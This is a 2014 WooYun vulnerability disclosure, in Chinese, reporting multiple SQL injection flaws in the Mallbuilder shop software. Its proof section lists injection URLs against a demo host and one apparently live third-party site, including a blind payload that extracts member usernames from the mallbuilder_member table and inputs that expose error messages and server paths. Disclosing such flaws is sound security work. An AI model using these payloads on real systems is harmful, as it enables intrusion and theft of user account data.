漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-077265
漏洞标题:Mallbuilder某处可以SQL注入
相关厂商:Mallbuilder
漏洞作者: 路人甲
提交时间:2014-09-25 14:18
修复时间:2014-12-24 14:20
公开时间:2014-12-24 14:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-24: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
N个SQL漏洞地址
详细说明:
N处不验证提交数据导致SQL注入
漏洞证明:
这个平台的好多数字都没有验证的。。天哪。。
列举几处
商品价格未验证,想怎么弄都行,本人菜鸟,觉得弄出所有用户的账号密码没问题
http://democn.mall-builder.com/shop.php?keyword=&price1=&price2=1000'&uid=349&action=product_list&m=product&sort=&cat=
这样就能把用户名猜出来,密码也一样:
http://democn.mall-builder.com/shop.php?keyword=&price1=&price2=1000 and 120>(select ASCII(substring(c.name,1,1)) from mallbuilder_member c order by c.name limit 0, 1)&uid=349&action=product_list&m=product&sort=&cat=
随便改了下m的值就直接报错报出物理地址
http://democn.mall-builder.com/shop.php?price1=&price2=&search=search&sort=&cat=&list_type=&uid=135&action=product_list&m=product;
除了商铺页面商品列表里的分类id居然也没有验证
http://democn.mall-builder.com/?m=product&s=list&id=100001%27
所有分页的页码虽然验证了但是负数时还是把SQL列出来了
http://democn.mall-builder.com/?firstRow=16&totalRows=-21a&m=product&s=list&id=100501
编辑产品的时候id没有检查
http://mall.0xi.com/main.php?edit=8060'&m=product&s=admin_product
有点后悔用了这套系统
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝